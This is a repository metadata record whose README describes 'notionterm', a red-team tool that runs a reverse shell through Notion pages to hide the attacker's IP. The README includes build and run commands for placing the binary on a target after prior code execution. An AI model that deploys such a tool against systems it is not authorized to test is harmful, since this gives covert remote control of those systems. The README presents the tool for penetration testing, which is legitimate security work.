{"id":13770061,"url":"https://github.com/ariary/notionterm","last_synced_at":"2025-04-26T19:31:46.213Z","repository":{"id":46067775,"uuid":"491132674","full_name":"ariary/notionterm","owner":"ariary","description":"🖥️📖 Embed reverse shell in Notion pages","archived":false,"fork":false,"pushed_at":"2023-03-07T15:39:03.000Z","size":8529,"stargazers_count":129,"open_issues_count":3,"forks_count":13,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-04T17:11:35.584Z","etag":null,"topics":["c2c","infosec","notion","notion-api","pentest","pentest-tool","redteam","reverse-shell","webshell"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"unlicense","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-05-11T13:53:21.000Z","updated_at":"2025-03-17T20:38:26.000Z","dependencies_parsed_at":"2024-01-06T21:34:17.204Z","dependency_job_id":"7fcfc408-315c-4b20-bec5-21224305b23c","html_url":"https://github.com/ariary/notionterm","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fnotionterm","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fnotionterm/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fnotionterm/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fnotionterm/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/notionterm/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251041415,"owners_count":21527187,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c2c","infosec","notion","notion-api","pentest","pentest-tool","redteam","reverse-shell","webshell"],"created_at":"2024-08-03T17:00:33.956Z","updated_at":"2025-04-26T19:31:45.066Z","avatar_url":"https://github.com/ariary.png","language":"Go","readme":"\u003cdiv align=\"center\"\u003e\n\u003ch1\u003e\n  \u003ccode\u003enotionterm\u003c/code\u003e \n\u003c/h1\u003e\n  \u003cimg src=\"https://github.com/ariary/notionterm/blob/main/img/notionterm.png\"  width=150\u003e\n  \n  \u003cstrong\u003e Embed reverse shell in \u003ca href=\"https://www.notion.so\"\u003eNotion\u003c/a\u003e pages.\u003c/strong\u003e\u003cbr\u003e\n  \u003ci\u003eHack while taking notes\u003c/i\u003e\n\n\u003ca href=\"https://github.com/spencerpauly/awesome-notion\"\u003e\u003cimg src=\"https://awesome.re/mentioned-badge.svg\"\u003e\u003c/a\u003e\n\n\u003c/div\u003e\n\n---\n\n![demo](https://github.com/ariary/notionterm/blob/main/img/demo_dark_light.gif)\n\n\n---\n\u003cdiv align=left\u003e\n\u003ch3\u003eFOR ➕:\u003c/h3\u003e\n\u003cul\u003e\n  \u003cli\u003eHiding attacker IP in reverse shell \u003ci\u003e(No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)\u003c/i\u003e\u003c/li\u003e\n  \u003cli\u003eDemo/Quick proof insertion within report\u003c/li\u003e\n  \u003cli\u003eHigh available and shareable reverse shell (desktop, browser, mobile)\u003c/li\u003e\n  \u003cli\u003eEncrypted and authenticated remote shell\u003c/li\u003e\n\u003c/ul\u003e \n\u003c/div\u003e\n\u003cdiv align=left\u003e\n\u003ch3\u003eNOT FOR ➖:\u003c/h3\u003e\n\u003cul\u003e\n  \u003cli\u003eLong and interactive shell session (see \u003ca href=https://github.com/ariary/tacos\u003etacos\u003c/a\u003e for that)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/div\u003e\n\n---\n\u003cdiv align=left\u003e\n\u003ch3 \u003eWhy? 🤔 \u003c/h3\u003e\nThe focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenal\n\u003c/div\u003e\n\u003cdiv align=right\u003e\n\u003ch3 \u003eHow?  🤷‍♂️\u003c/h3\u003e\nJust use notion as usual and launch \u003ccode\u003enotionterm\u003c/code\u003e on target.\n\u003c/div\u003e\n\u003cdiv align=left\u003e\n\u003ch3 \u003eRequirements 🖊️\u003c/h3\u003e\n \u003cul\u003e\n  \u003cli\u003eNotion software and API key\u003c/li\u003e\n  \u003cli\u003eAllowed HTTP communication from the target to the notion domain\u003c/li\u003e\n  \u003cli\u003ePrior RCE on target\u003c/li\u003e\n\u003c/ul\u003e \n\u003c/div\u003e\n\n---\n\u003cblockquote align=left\u003e\nroughly inspired by the great idea of \u003ca href=\"https://github.com/mttaggart/OffensiveNotion\"\u003eOffensiveNotion\u003c/a\u003e and \u003ca href=\"https://github.com/ariary/Notionion\"\u003enotionion\u003c/a\u003e! \n\u003c/blockquote\u003e\n\n\n## TL;DR\n\nLearn command and flags is too boring: **Use `wrap-notionterm.sh`**\n\n\n## Quickstart\n\n### 🏗️ Set-up\n1. Create a page and give to the integration API key the permissions to have page write access\n2. Build `notionterm` and transfer it on target machine (see [Build](#build))\n\n### 👟 Run\n\nThere are 3 main ways to run `notionterm`:\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003e\"normal\" mode\u003c/b\u003e\u003cbr\u003e\u003ci\u003eGet terminal, stop/unstop it, etc...\u003c/i\u003e\u003c/summary\u003e\n\u003ccode\u003e\nnotionterm [flags]\n\u003c/code\u003e\u003cbr\u003e\nStart the shell with the button widget: turn \u003ccode\u003eON\u003c/code\u003e, do you reverse shell stuff, turn \u003ccode\u003eOFF\u003c/code\u003e to pause, turn \u003ccode\u003eON\u003c/code\u003e to resume etc...\n\u003c/details\u003e\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003e\"server\" mode\u003c/b\u003e\u003cbr\u003e\u003ci\u003eEase notionterm embedding in any page\u003c/i\u003e\u003c/summary\u003e\n\u003ccode\u003e\nnotionterm --server [flags]\n\u003c/code\u003e\u003cbr\u003e\nStart a shell session in any page by creating an embed block with URL containing the page id \u003ci\u003e(\u003ccode\u003eCTRL+L\u003c/code\u003eto get it)\u003c/i\u003e: \u003ccode\u003ehttps://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]\u003c/code\u003e.\n\u003c/details\u003e\n\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003e\u003ccode\u003elight\u003c/code\u003e mode\u003c/b\u003e\u003cbr\u003e\u003ci\u003eOnly perform HTTP traffic from target → notion\u003c/i\u003e\u003c/summary\u003e\n\u003ccode\u003e\nnotionterm light [flags]\n\u003c/code\u003e\n\u003c/details\u003e\n\n## Build\n\nAs `notionterm` is aimed to be run on target machine it must be built to fit with it.\n\nThus set env var to fit with the target requirement:\n```shell\nGOOS=[windows/linux/darwin]\n```\n\n### Simple build\n```shell\ngit clone https://github.com/ariary/notionterm.git \u0026\u0026 cd notionterm\nGOOS=$GOOS go build notionterm.go\n```\n\nYou will need to set API key and notion page URL using either env var (`NOTION_TOKEN` \u0026 `NOTION_PAGE_URL`) or flags (`--token` \u0026 `--page-url`)\n\n### \"All-inclusive\" build\nEmbed directly the notion integration API token and notion page url in the binary. *⚠️ everybody with access to the binary can retrieved the token. For security reason don't share it and remove it after use.*\n\nSet according env var:\n```shell\nexport NOTION_PAGE_URL=[NOTION_PAGE_URL]\nexport NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]\n```\nAnd build it:\n```\ngit clone https://github.com/ariary/notionterm.git \u0026\u0026 cd notionterm\n./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS\n```\n","funding_links":[],"categories":["Tools"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fnotionterm","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Fnotionterm","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fnotionterm/lists"}